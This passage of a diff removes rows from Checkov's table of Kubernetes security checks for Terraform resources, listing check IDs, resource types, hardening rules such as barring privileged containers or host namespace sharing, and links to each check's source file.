-| 1852 | CKV_K8S_16      | resource | kubernetes_deployment                                   | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                          |
-| 1853 | CKV_K8S_16      | resource | kubernetes_deployment_v1                                | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                          |
-| 1854 | CKV_K8S_16      | resource | kubernetes_pod                                          | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                          |
-| 1855 | CKV_K8S_16      | resource | kubernetes_pod_v1                                       | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                          |
-| 1856 | CKV_K8S_17      | resource | kubernetes_deployment                                   | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                        |
-| 1857 | CKV_K8S_17      | resource | kubernetes_deployment_v1                                | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                        |
-| 1858 | CKV_K8S_17      | resource | kubernetes_pod                                          | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                        |
-| 1859 | CKV_K8S_17      | resource | kubernetes_pod_v1                                       | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                        |
-| 1860 | CKV_K8S_18      | resource | kubernetes_deployment                                   | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                        |
-| 1861 | CKV_K8S_18      | resource | kubernetes_deployment_v1                                | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                        |
-| 1862 | CKV_K8S_18      | resource | kubernetes_pod                                          | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                        |
-| 1863 | CKV_K8S_18      | resource | kubernetes_pod_v1                                       | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                        |
-| 1864 | CKV_K8S_19      | resource | kubernetes_deployment                                   | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                            |
-| 1865 | CKV_K8S_19      | resource | kubernetes_deployment_v1                                | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                            |
-| 1866 | CKV_K8S_19      | resource | kubernetes_pod                                          | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                            |
-| 1867 | CKV_K8S_19      | resource | kubernetes_pod_v1                                       | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                            |
-| 1868 | CKV_K8S_20      | resource | kubernetes_deployment                                   | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                |
-| 1869 | CKV_K8S_20      | resource | kubernetes_deployment_v1                                | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                |
-| 1870 | CKV_K8S_20      | resource | kubernetes_pod                                          | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                |
-| 1871 | CKV_K8S_20      | resource | kubernetes_pod_v1                                       | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                |
-| 1872 | CKV_K8S_21      | resource | kubernetes_config_map                                   | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1873 | CKV_K8S_21      | resource | kubernetes_config_map_v1                                | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1874 | CKV_K8S_21      | resource | kubernetes_cron_job                                     | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1875 | CKV_K8S_21      | resource | kubernetes_cron_job_v1                                  | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1876 | CKV_K8S_21      | resource | kubernetes_daemon_set_v1                                | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1877 | CKV_K8S_21      | resource | kubernetes_daemonset                                    | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1878 | CKV_K8S_21      | resource | kubernetes_deployment                                   | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1879 | CKV_K8S_21      | resource | kubernetes_deployment_v1                                | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1880 | CKV_K8S_21      | resource | kubernetes_ingress                                      | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1881 | CKV_K8S_21      | resource | kubernetes_ingress_v1                                   | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1882 | CKV_K8S_21      | resource | kubernetes_job                                          | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1883 | CKV_K8S_21      | resource | kubernetes_job_v1                                       | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1884 | CKV_K8S_21      | resource | kubernetes_pod                                          | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1885 | CKV_K8S_21      | resource | kubernetes_pod_v1                                       | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1886 | CKV_K8S_21      | resource | kubernetes_replication_controller                       | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1887 | CKV_K8S_21      | resource | kubernetes_replication_controller_v1                    | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1888 | CKV_K8S_21      | resource | kubernetes_role_binding                                 | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1889 | CKV_K8S_21      | resource | kubernetes_role_binding_v1                              | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1890 | CKV_K8S_21      | resource | kubernetes_secret                                       | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1891 | CKV_K8S_21      | resource | kubernetes_secret_v1                                    | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1892 | CKV_K8S_21      | resource | kubernetes_service                                      | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1893 | CKV_K8S_21      | resource | kubernetes_service_account                              | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1894 | CKV_K8S_21      | resource | kubernetes_service_account_v1                           | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1895 | CKV_K8S_21      | resource | kubernetes_service_v1                                   | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1896 | CKV_K8S_21      | resource | kubernetes_stateful_set                                 | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1897 | CKV_K8S_21      | resource | kubernetes_stateful_set_v1                              | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                |
-| 1898 | CKV_K8S_22      | resource | kubernetes_deployment                                   | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                    |
-| 1899 | CKV_K8S_22      | resource | kubernetes_deployment_v1                                | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                    |
-| 1900 | CKV_K8S_22      | resource | kubernetes_pod                                          | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                    |
-| 1901 | CKV_K8S_22      | resource | kubernetes_pod_v1                                       | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                    |
-| 1902 | CKV_K8S_24      | resource | kubernetes_pod_security_policy                          | Do not allow containers with added capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py)                                                                    |
-| 1903 | CKV_K8S_25      | resource | kubernetes_deployment                                   | Minimize the admission of containers with added capability                                                                                                                                               | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                          |
-| 1904 | CKV_K8S_25      | resource | kubernetes_deployment_v1                                | Minimize the admission of containers with added capability                                                                                                                                               | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                          |
-| 1905 | CKV_K8S_25      | resource | kubernetes_pod                                          | Minimize the admission of containers with added capability                                                                                                                                               | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                          |
-| 1906 | CKV_K8S_25      | resource | kubernetes_pod_v1                                       | Minimize the admission of containers with added capability                                                                                                                                               | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                          |
-| 1907 | CKV_K8S_26      | resource | kubernetes_deployment                                   | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                |
-| 1908 | CKV_K8S_26      | resource | kubernetes_deployment_v1                                | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                |
-| 1909 | CKV_K8S_26      | resource | kubernetes_pod                                          | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                |
-| 1910 | CKV_K8S_26      | resource | kubernetes_pod_v1                                       | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                |
-| 1911 | CKV_K8S_27      | resource | kubernetes_daemon_set_v1                                | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 1912 | CKV_K8S_27      | resource | kubernetes_daemonset                                    | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 1913 | CKV_K8S_27      | resource | kubernetes_deployment                                   | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 1914 | CKV_K8S_27      | resource | kubernetes_deployment_v1                                | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 1915 | CKV_K8S_27      | resource | kubernetes_pod                                          | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 1916 | CKV_K8S_27      | resource | kubernetes_pod_v1                                       | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                            |
-| 1917 | CKV_K8S_28      | resource | kubernetes_deployment                                   | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                |
-| 1918 | CKV_K8S_28      | resource | kubernetes_deployment_v1                                | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                |
-| 1919 | CKV_K8S_28      | resource | kubernetes_pod                                          | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                |
-| 1920 | CKV_K8S_28      | resource | kubernetes_pod_v1                                       | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                |
-| 1921 | CKV_K8S_29      | resource | kubernetes_daemon_set_v1                                | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 1922 | CKV_K8S_29      | resource | kubernetes_daemonset                                    | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 1923 | CKV_K8S_29      | resource | kubernetes_deployment                                   | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 1924 | CKV_K8S_29      | resource | kubernetes_deployment_v1                                | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 1925 | CKV_K8S_29      | resource | kubernetes_pod                                          | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 1926 | CKV_K8S_29      | resource | kubernetes_pod_v1                                       | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                            |
-| 1927 | CKV_K8S_30      | resource | kubernetes_deployment                                   | Apply security context to your pods and containers                                                                                                                                                       | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                |
-| 1928 | CKV_K8S_30      | resource | kubernetes_deployment_v1                                | Apply security context to your pods and containers                                                                                                                                                       | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                |
-| 1929 | CKV_K8S_30      | resource | kubernetes_pod                                          | Apply security context to your pods and containers                                                                                                                                                       | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                |
-| 1930 | CKV_K8S_30      | resource | kubernetes_pod_v1                                       | Apply security context to your pods and containers                                                                                                                                                       | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                |
-| 1931 | CKV_K8S_32      | resource | kubernetes_pod_security_policy                          | Ensure default seccomp profile set to docker/default or runtime/default                                                                                                                                  | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py)                                                                                            |
-| 1932 | CKV_K8S_34      | resource | kubernetes_deployment                                   | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                    |
-| 1933 | CKV_K8S_34      | resource | kubernetes_deployment_v1                                | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                    |
-| 1934 | CKV_K8S_34      | resource | kubernetes_pod                                          | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                    |
-| 1935 | CKV_K8S_34      | resource | kubernetes_pod_v1                                       | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                    |
-| 1936 | CKV_K8S_35      | resource | kubernetes_deployment                                   | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                  |
-| 1937 | CKV_K8S_35      | resource | kubernetes_deployment_v1                                | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                  |
-| 1938 | CKV_K8S_35      | resource | kubernetes_pod                                          | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                  |
-| 1939 | CKV_K8S_35      | resource | kubernetes_pod_v1                                       | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                  |
-| 1940 | CKV_K8S_36      | resource | kubernetes_pod_security_policy                          | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py)                                                                  |
-| 1941 | CKV_K8S_37      | resource | kubernetes_deployment                                   | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                        |
-| 1942 | CKV_K8S_37      | resource | kubernetes_deployment_v1                                | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                        |
-| 1943 | CKV_K8S_37      | resource | kubernetes_pod                                          | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                        |
-| 1944 | CKV_K8S_37      | resource | kubernetes_pod_v1                                       | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                        |
-| 1945 | CKV_K8S_39      | resource | kubernetes_deployment                                   | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                          |
-| 1946 | CKV_K8S_39      | resource | kubernetes_deployment_v1                                | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                          |
-| 1947 | CKV_K8S_39      | resource | kubernetes_pod                                          | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                          |
-| 1948 | CKV_K8S_39      | resource | kubernetes_pod_v1                                       | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                          |
-| 1949 | CKV_K8S_41      | resource | kubernetes_service_account                              | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py)                                                                      |
-| 1950 | CKV_K8S_41      | resource | kubernetes_service_account_v1                           | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py)                                                                      |
-| 1951 | CKV_K8S_42      | resource | kubernetes_cluster_role_binding                         | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                        |
-| 1952 | CKV_K8S_42      | resource | kubernetes_cluster_role_binding_v1                      | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                        |
-| 1953 | CKV_K8S_42      | resource | kubernetes_role_binding                                 | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                        |
-| 1954 | CKV_K8S_42      | resource | kubernetes_role_binding_v1                              | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                        |
-| 1955 | CKV_K8S_43      | resource | kubernetes_deployment                                   | Image should use digest                                                                                                                                                                                  | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                          |
-| 1956 | CKV_K8S_43      | resource | kubernetes_deployment_v1                                | Image should use digest                                                                                                                                                                                  | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                          |
-| 1957 | CKV_K8S_43      | resource | kubernetes_pod                                          | Image should use digest                                                                                                                                                                                  | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                          |
